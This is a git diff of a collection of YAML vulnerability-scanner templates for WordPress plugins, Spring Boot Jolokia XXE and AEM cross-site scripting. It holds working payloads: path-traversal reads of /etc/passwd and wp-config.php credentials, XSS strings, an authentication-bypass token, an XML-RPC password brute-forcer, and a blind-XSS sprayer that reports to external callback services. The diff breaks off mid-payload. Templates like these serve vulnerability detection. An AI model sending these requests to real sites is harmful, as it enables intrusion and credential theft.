tags: wordpress,listing + description: Searches for sensitive directories present in the super-forms plugin. + reference: + - https://www.exploit-db.com/ghdb/6776 + metadata: + max-request: 1 + tags: listing,plugin,edb,wordpress -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/super-forms/" + matchers-condition: and matchers: - type: word @@ -19,4 +24,6 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a004630440220598c613d50e93acbd1801bb80297c2cd71ed3ac29a43c470434093cb85a247d802205e80e4487cf9ad3eeaa6827d104c42960a6ea6696c6dc759315efc5699146809:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-super-forms-11588.yaml b/poc/wordpress/wp-super-forms-11588.yaml index febe3675a0..d9003227fd 100644 --- a/poc/wordpress/wp-super-forms-11588.yaml +++ b/poc/wordpress/wp-super-forms-11588.yaml @@ -1,29 +1,20 @@ id: wordpress-super-forms - info: name: WordPress super-forms Plugin Directory Listing author: pussycat0x severity: low - description: Searches for sensitive directories present in the super-forms plugin. - reference: - - https://www.exploit-db.com/ghdb/6776 - metadata: - max-request: 1 - tags: listing,plugin,edb,wordpress - -http: + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6776 + tags: wordpress,listing,plugin +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/super-forms/" - matchers-condition: and matchers: - type: word words: - "Index of /wp-content/plugins/super-forms/" - - type: status status: - 200 - -# digest: 490a004630440220598c613d50e93acbd1801bb80297c2cd71ed3ac29a43c470434093cb85a247d802205e80e4487cf9ad3eeaa6827d104c42960a6ea6696c6dc759315efc5699146809:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-tinymce-lfi.yaml b/poc/wordpress/wp-tinymce-lfi.yaml index 9091f13594..d34333cd36 100644 --- a/poc/wordpress/wp-tinymce-lfi.yaml +++ b/poc/wordpress/wp-tinymce-lfi.yaml @@ -1,5 +1,4 @@ id: wp-tinymce-lfi - info: name: Tinymce Thumbnail Gallery <=1.0.7 - Local File Inclusion author: 0x_Akoko @@ -12,15 +11,11 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - metadata: - max-request: 1 tags: wordpress,wp-theme,lfi,wordpress,tinymce - -http: +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php' - matchers-condition: and matchers: - type: word @@ -29,9 +24,8 @@ http: - "DB_NAME" - "DB_PASSWORD" condition: and - - type: status status: - 200 -# digest: 4a0a0047304502201c2ac9d65b16487b71e4b7c4d880163c783f630561a93ead417b304fd9279cff022100ebb86be060b482ba4fadce96e5cfa137576edf89c454435a38bd7bc0680dca32:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-tutor-lfi-11596.yaml b/poc/wordpress/wp-tutor-lfi-11596.yaml index 4362f3d8af..02a965a0f1 100644 --- a/poc/wordpress/wp-tutor-lfi-11596.yaml +++ b/poc/wordpress/wp-tutor-lfi-11596.yaml @@ -1,27 +1,16 @@ id: wp-tutor-lfi - info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. - reference: - - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 + reference: https://www.exploit-db.com/exploits/48058 tags: wordpress,wp-plugin,lfi - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-tutor-lfi-11600.yaml b/poc/wordpress/wp-tutor-lfi.yaml similarity index 100% rename from poc/wordpress/wp-tutor-lfi-11600.yaml rename to poc/wordpress/wp-tutor-lfi.yaml diff --git a/poc/wordpress/wp-upload-data-11605.yaml b/poc/wordpress/wp-upload-data-11605.yaml index ad366b15a7..96634b10c2 100644 --- a/poc/wordpress/wp-upload-data-11605.yaml +++ b/poc/wordpress/wp-upload-data-11605.yaml @@ -1,5 +1,4 @@ id: wordpress-upload-data - info: name: wordpress-upload-data author: pussycat0x @@ -7,23 +6,19 @@ info: description: The remote WordPress installation contains a file 'data.txt' under the '/wp-content/uploads/' folder that has sensitive information inside it. reference: https://www.exploit-db.com/ghdb/7040 tags: wordpress,listing - requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/data.txt" - matchers-condition: and matchers: - type: word words: - "admin:" - - type: word part: header words: - "text/plain" - - type: status status: - 200 diff --git a/poc/wordpress/wp-vault-lfi-11610.yaml b/poc/wordpress/wp-vault-lfi-11610.yaml index 5c3b55be99..01d9e3e67e 100644 --- a/poc/wordpress/wp-vault-lfi-11610.yaml +++ b/poc/wordpress/wp-vault-lfi-11610.yaml @@ -1,6 +1,6 @@ id: wp-vault-local-file-inclusion info: - name: WP Vault 0.8.6.6 – Local File Inclusion + name: WP Vault 0.8.6.6 Local File Inclusion author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/40850 @@ -13,7 +13,7 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0" + - "root:.*:0:0:" - type: status status: - 200 diff --git a/poc/wordpress/wp-vault-local-file-inclusion.yaml b/poc/wordpress/wp-vault-local-file-inclusion.yaml new file mode 100755 index 0000000000..8869a324ad --- /dev/null +++ b/poc/wordpress/wp-vault-local-file-inclusion.yaml @@ -0,0 +1,33 @@ +id: wp-vault-local-file-inclusion +info: + name: WP Vault 0.8.6.6 Local File Inclusion + author: + - l0ne1y + description: |- + WordPress Plugin Vault 存在路径遍历问题导致文件包含漏洞 + WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 + + WordPress Plugin Vault 0.8.6.6存在路径遍历漏洞,该漏洞允许远程攻击者通过wpv-image参数读取系统中的任意文件。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.org/plugins/ + + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' + method: GET diff --git a/poc/wordpress/wp-whmcs-xss-11614.yaml b/poc/wordpress/wp-whmcs-xss-11614.yaml new file mode 100644 index 0000000000..d8da7d8763 --- /dev/null +++ b/poc/wordpress/wp-whmcs-xss-11614.yaml @@ -0,0 +1,37 @@ +id: wp-whmcs-xss +info: + name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS) + author: dhiyaneshDk + severity: medium + description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting + reference: + - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c + tags: wordpress,wp-plugin,authenticated,whmcs,xss +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-whmcs-xss.yaml b/poc/wordpress/wp-whmcs-xss.yaml index 69a4a54185..3c39494408 100644 --- a/poc/wordpress/wp-whmcs-xss.yaml +++ b/poc/wordpress/wp-whmcs-xss.yaml @@ -1,14 +1,11 @@ id: wp-whmcs-xss - info: name: WHMCS Bridge < 6.4b - Reflected Cross-Site Scripting (XSS) author: dhiyaneshDk severity: medium description: The plugin does not sanitise and escape the error parameter before outputting it back in admin dashboard, leading to a Reflected Cross-Site Scripting - reference: - - https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c + reference: https://wpscan.com/vulnerability/4aae2dd9-8d51-4633-91bc-ddb53ca3471c tags: wordpress,wp-plugin,authenticated,whmcs,xss - requests: - raw: - | @@ -22,7 +19,6 @@ requests: - | GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: @@ -31,12 +27,10 @@ requests: words: - "" condition: and - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-woocommerce-email-verification-11619.yaml b/poc/wordpress/wp-woocommerce-email-verification-11619.yaml index e4393fb210..97e8c51dc3 100644 --- a/poc/wordpress/wp-woocommerce-email-verification-11619.yaml +++ b/poc/wordpress/wp-woocommerce-email-verification-11619.yaml @@ -1,46 +1,25 @@ id: wp-woocommerce-email-verification - info: - name: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass - author: random_robbie,daffianfo + name: wordpress-emails-verification-for-woocommerce + author: random_robbie severity: critical - description: | - Email Verification for WooCommerce Wordpress plugin prior to version 1.8.2 contains a loose comparison issue which could allow any user to log in as administrator. - reference: - - https://wpvulndb.com/vulnerabilities/10318 - - https://wpscan.com/vulnerability/0c93832c-83db-4053-8a11-70de966bb3a8 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cwe-id: CWE-288 - metadata: - max-request: 2 - tags: woocommerce,wp,wpscan,wordpress,wp-plugin - -http: + tags: wordpress,wp-plugin + description: Email Verification for WooCommerce < 1.8.2 - Loose Comparison to Authentication Bypass + reference: https://wpvulndb.com/vulnerabilities/10318 + # GDPR plugin may give a false positive so double check headers +requests: - method: GET path: - - "{{BaseURL}}/my-account/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - "{{BaseURL}}/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" - - stop-at-first-match: true - + - "{{BaseURL}}/blog/?alg_wc_ev_verify_email=eyJpZCI6MSwiY29kZSI6MH0=" matchers-condition: and matchers: - - type: regex - part: header - regex: - - "wordpress_logged_in_[a-z0-9]{32}" - - type: word - part: body words: - - "Your account has been activated!" - - "From your account dashboard you can view your" - condition: and - + - "wordpress_logged_in" + part: header - type: status status: - - 200 - -# digest: 4b0a00483046022100987033fa8b4186e78f6073527adcb6730eff184c2fd886cdec3f48e798b7f2d9022100faad5d8bc5339281f3b2e3cb1b0687a22e516ae19dc3c5087a64427c7ed68066:922c64590222798bb761d5b6d8e72950 + - 401 + - 403 + negative: true diff --git a/poc/wordpress/wp-woocommerce-file-download-11620.yaml b/poc/wordpress/wp-woocommerce-file-download-11620.yaml new file mode 100644 index 0000000000..9427c4a15c --- /dev/null +++ b/poc/wordpress/wp-woocommerce-file-download-11620.yaml @@ -0,0 +1,38 @@ +id: wp-woocommerce-file-download + +info: + name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download + author: 0x_Akoko + severity: high + description: | + WordPress WooCommerce < 1.2.7 is susceptible to file download vulnerabilities. The lack of authorization checks in the handle_downloads() function hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. + reference: | + - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 + - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.6 + cwe-id: CWE-22 + metadata: + max-request: 1 + tags: wordpress,woocommerce,lfi,wp-plugin,wp + +http: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ab1837bca9b6f6e6b23d99458b8a2907f23c71b2f5d81cee55aaac79e9f4c2a6022100db17296e4466ad8f17c1ad98e0b52ef44c844e5d16a60a8a8bcda37220127990:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-woocommerce-file-download.yaml b/poc/wordpress/wp-woocommerce-file-download.yaml deleted file mode 100644 index d49796a7a3..0000000000 --- a/poc/wordpress/wp-woocommerce-file-download.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: wp-woocommerce-file-download -info: - name: Product Input Fields for WooCommerce < 1.2.7 - Unauthenticated File Download - author: 0x_Akoko - severity: high - tags: wordpress,woocommerce,lfi - description: The lack of authorisation checks in the handle_downloads() function, hooked to admin_init() could allow unauthenticated users to download arbitrary files from the blog using a path traversal payload. - reference: - - https://wpscan.com/vulnerability/15f345e6-fc53-4bac-bc5a-de898181ea74 - - https://blog.nintechnet.com/high-severity-vulnerability-fixed-in-product-input-fields-for-woocommerce/ -requests: - - method: GET - path: - - '{{BaseURL}}/wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml index 3dc1310215..26b60896bf 100644 --- a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml +++ b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml @@ -3,7 +3,7 @@ info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid severity: high - description: Ths template bruteforces username and passwords through xmlrpc.php being available. + description: This template bruteforces username and passwords through xmlrpc.php being available. reference: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ diff --git a/poc/wordpress/wp-xmlrpc-pingback-detection.yaml b/poc/wordpress/wp-xmlrpc-pingback-detection.yaml index d1f2247e27..af1364f6d4 100644 --- a/poc/wordpress/wp-xmlrpc-pingback-detection.yaml +++ b/poc/wordpress/wp-xmlrpc-pingback-detection.yaml @@ -1,13 +1,17 @@ id: wp-xmlrpc-pingback-detection + info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 -requests: + metadata: + max-request: 1 + tags: wordpress,ssrf,oast,xmlrpc + +http: - raw: - | POST /xmlrpc.php HTTP/1.1 @@ -28,8 +32,11 @@ requests: + matchers: - type: word part: interactsh_protocol words: - "http" + +# digest: 4b0a004830460221008b8847819052a4cc6cd580593aa61fc11d40f73fa22d07b122b1a20410cfc54c022100ff2ea66548804bac51edcc23bfe7259dd34f27a13a7eef2890239b93dcdeb8cf:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wpdm-cache-session-11436.yaml b/poc/wordpress/wpdm-cache-session-11436.yaml new file mode 100644 index 0000000000..ba8153e31e --- /dev/null +++ b/poc/wordpress/wpdm-cache-session-11436.yaml @@ -0,0 +1,23 @@ +id: wpdm-cache-session +info: + name: Wpdm-Cache Session + author: dhiyaneshDk + severity: medium + reference: https://www.exploit-db.com/ghdb/7004 + tags: wordpress +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' + matchers-condition: and + matchers: + - type: word + words: + - "Index of /" + - ".txt" + - "wpdm-cache" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/wordpress/wpdm-cache-session-11438.yaml b/poc/wordpress/wpdm-cache-session-11438.yaml deleted file mode 100644 index 9e12c4ad90..0000000000 --- a/poc/wordpress/wpdm-cache-session-11438.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wpdm-cache-session -info: - name: Wpdm-Cache Session - author: dhiyaneshDk - severity: medium - reference: - - https://www.exploit-db.com/ghdb/7004 - tags: wordpress -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/uploads/wpdm-cache/' - matchers-condition: and - matchers: - - type: word - words: - - "Index of /" - - ".txt" - - "wpdm-cache" - condition: and - part: body - - type: status - status: - - 200 diff --git a/poc/wordpress/wpengine-config-check.yaml b/poc/wordpress/wpengine-config-check.yaml deleted file mode 100644 index c6db13b52d..0000000000 --- a/poc/wordpress/wpengine-config-check.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wpengine-config-check - -info: - name: WP Engine Config Check - author: SirBugs - severity: high - -requests: - - method: GET - path: - - "{{BaseURL}}/wpeprivate/config.json" - - matchers-condition: and - matchers: - - type: word - condition: or - words: - - "WPENGINE_SESSION_DB_USERNAME" - - "WPENGINE_SESSION_DB_PASSWORD" - - "WPENGINE_SESSION" - - "wpengine_apikey" - - "WP_CACHE_KEY_SALT" diff --git a/poc/wordpress/wptouch-open-redirect-11592.yaml b/poc/wordpress/wptouch-open-redirect-11592.yaml new file mode 100644 index 0000000000..c5f6660a05 --- /dev/null +++ b/poc/wordpress/wptouch-open-redirect-11592.yaml @@ -0,0 +1,24 @@ +id: wptouch-open-redirect +info: + name: WPTouch Switch Desktop 3.x Open Redirection + author: 0x_Akoko + severity: medium + description: | + WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. + + An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. + + Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. + + The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. + reference: https://cxsecurity.com/issue/WLB-2020030114 + tags: wp-plugin,redirect,wordpress +requests: + - method: GET + path: + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/poc/wordpress/wptouch-open-redirect-11595.yaml b/poc/wordpress/wptouch-open-redirect-11595.yaml index 576e334c9e..1bd339ff3c 100644 --- a/poc/wordpress/wptouch-open-redirect-11595.yaml +++ b/poc/wordpress/wptouch-open-redirect-11595.yaml @@ -1,25 +1,30 @@ id: wptouch-open-redirect + info: - name: WPTouch Switch Desktop 3.x Open Redirection + name: WordPress WPtouch 3.x - Open Redirect author: 0x_Akoko severity: medium description: | - WordPress WPTouch Switch Desktop 3.x accepts a user-controlled input that specifies a link to an external site, and uses that link in a Redirect. This simplifies phishing attacks. - - An HTTPparameter may contain a URL value and could cause the web application to redirect the request to the specified URL. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials. Because the server name in the modified link is identical to the original site, phishing attempts have a more trustworthy appearance. - - Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. - - The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. + WordPress WPtouch plugin 3.x contains an open redirect vulnerability. The plugin fails to properly sanitize user-supplied input. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. reference: - https://cxsecurity.com/issue/WLB-2020030114 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 + metadata: + max-request: 1 tags: wp-plugin,redirect,wordpress -requests: + +http: - method: GET path: - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://interact.sh/" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header + +# digest: 4b0a00483046022100f3c87781d27f6cc65f7c1362b9ac9f410327c860c77e82f18d6c995bc2f5fd66022100eec2e1ba6ac9511d829dff5a51691592bebe32cfb1da8e33cbed26ea2c54fd15:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wptouch-plugin-open-redirect.yaml b/poc/wordpress/wptouch-plugin-open-redirect.yaml index 4e7dd0fa9d..e26d6d42a2 100644 --- a/poc/wordpress/wptouch-plugin-open-redirect.yaml +++ b/poc/wordpress/wptouch-plugin-open-redirect.yaml @@ -1,14 +1,17 @@ id: wptouch-plugin-open-redirect + info: - name: WPTouch Switch Desktop 3.x Open Redirection + name: Pie Register < 3.7.2.4 - Open Redirect author: 0x_Akoko - reference: https://cxsecurity.com/issue/WLB-2020030114 - severity: medium - tags: wp,redirect,wordpress + reference: https://wpscan.com/vulnerability/f6efa32f-51df-44b4-bbba-e67ed5785dd4 + severity: low + tags: wp,redirect,wp-plugin + requests: - method: GET path: - - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" + - "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com" + matchers: - type: regex regex: diff --git a/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml b/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml new file mode 100644 index 0000000000..8da6679e3e --- /dev/null +++ b/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10430.yaml @@ -0,0 +1,28 @@ +id: springboot-actuators-jolokia-xxe +info: + name: Spring Boot Actuators (Jolokia) XXE + author: dwisiswant0,ipanda + severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe +requests: + - method: GET + path: + - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "http:\\/\\/nonexistent:31337\\/logback.xml" + - "reloadByURL" + - "JoranException" + condition: and + - type: status + status: + - 200 diff --git a/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml b/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml deleted file mode 100644 index 8d86dd794f..0000000000 --- a/poc/xml_external_entity/springboot-actuators-jolokia-xxe-10431.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: springboot-actuators-jolokia-xxe - -info: - name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0,ipanda - severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. - reference: - - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - - https://github.com/mpgn/Spring-Boot-Actuator-Exploit - tags: springboot,jolokia,xxe - -requests: - - method: GET - path: - - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" - - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "http:\\/\\/nonexistent:31337\\/logback.xml" - - "reloadByURL" - - "JoranException" - condition: and \ No newline at end of file diff --git a/poc/xss/aem-setpreferences-xss.yaml b/poc/xss/aem-setpreferences-xss.yaml deleted file mode 100644 index 50e7da80ff..0000000000 --- a/poc/xss/aem-setpreferences-xss.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: aem-setpreferences-xss - -info: - name: AEM setPreferences XSS - author: zinminphy0,dhiyaneshDK - reference: - - https://www.youtube.com/watch?v=VwLSUHNhrOw&t=142s - - https://github.com/projectdiscovery/nuclei-templates/issues/3225 - - https://twitter.com/zin_min_phyo/status/1465394815042916352 - severity: medium - tags: aem,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - "{{BaseURL}}/content/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=//a" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "" - - 'A JSONObject text must begin with' - condition: and - - - type: status - status: - - 400 \ No newline at end of file diff --git a/poc/xss/aem-xss-childlist-selector-197.yaml b/poc/xss/aem-xss-childlist-selector-198.yaml similarity index 100% rename from poc/xss/aem-xss-childlist-selector-197.yaml rename to poc/xss/aem-xss-childlist-selector-198.yaml diff --git a/poc/xss/aem-xss-childlist-selector.yaml b/poc/xss/aem-xss-childlist-selector.yaml deleted file mode 100644 index c8551970bf..0000000000 --- a/poc/xss/aem-xss-childlist-selector.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: aem-xss-childlist-selector - -info: - name: XSS in childlist selector - author: dhiyaneshDk - severity: medium - description: | - Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - metadata: - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - - matchers-condition: and - matchers: - - type: word - words: - - '' - - '{"path":"/etc/designs/xh1x.childrenlist.json' - condition: and - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/poc/xss/basic-xss-prober-698.yaml b/poc/xss/basic-xss-prober-698.yaml deleted file mode 100644 index 34896e90c5..0000000000 --- a/poc/xss/basic-xss-prober-698.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: basic-xss-prober - -info: - name: Basic XSS Prober - Cross-Site Scripting - author: nadino,geeknik - severity: low - description: A cross-site scripting vulnerability was discovered via generic testing. Manual testing is needed to verify exploitation. - # Basic XSS prober - # Manual testing needed for exploitation - metadata: - max-request: 1 - tags: xss,generic - -http: - - method: GET - path: - - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" - - matchers-condition: and - matchers: - - type: word - words: - - "\">" - part: body - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 - -# digest: 4a0a00473045022100da0d7ddbb8a6ad2fb451fc4ca6d957d06b7fda404ff1e41c443865abfffc40ee022054e97de3bbe455dd05e4b756b8b4749842b38f973645eece0b047775512cafe4:922c64590222798bb761d5b6d8e72950 diff --git a/poc/xss/blind-xss-user-agent.yaml b/poc/xss/blind-xss-user-agent.yaml index 6319dc47cb..3f6bcba7bb 100644 --- a/poc/xss/blind-xss-user-agent.yaml +++ b/poc/xss/blind-xss-user-agent.yaml @@ -1,61 +1,30 @@ id: blind-xss info: - name: Blind Cross Site Scripting - author: 0xKayala (Satya Prakash) - severity: high - description: This template will spray blind XSS payloads into URLs. Use 'xss.report', 'bxsshunter.com', 'xsshunter.trufflesecurity.com', 'ez.pe' or 'self-hosted server' to check if the payload fired. - tags: xss, blind-xss, dast, bxss, generic + name: Blind XSS + author: shelled + severity: medium + description: This template will spray blind XSS payloads into URLs. Use xss.report to check if the payload fired. + tags: xss,blind,generic -variables: - first: "{{rand_int(10000, 99999)}}" - script_payload_1: "" - script_payload_2: "\"><41707" - script_payload_3: "" - script_payload_4: "" - script_payload_5: "" - script_payload_6: "" - script_payload_7: "\u0022\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e" - script_payload_8: 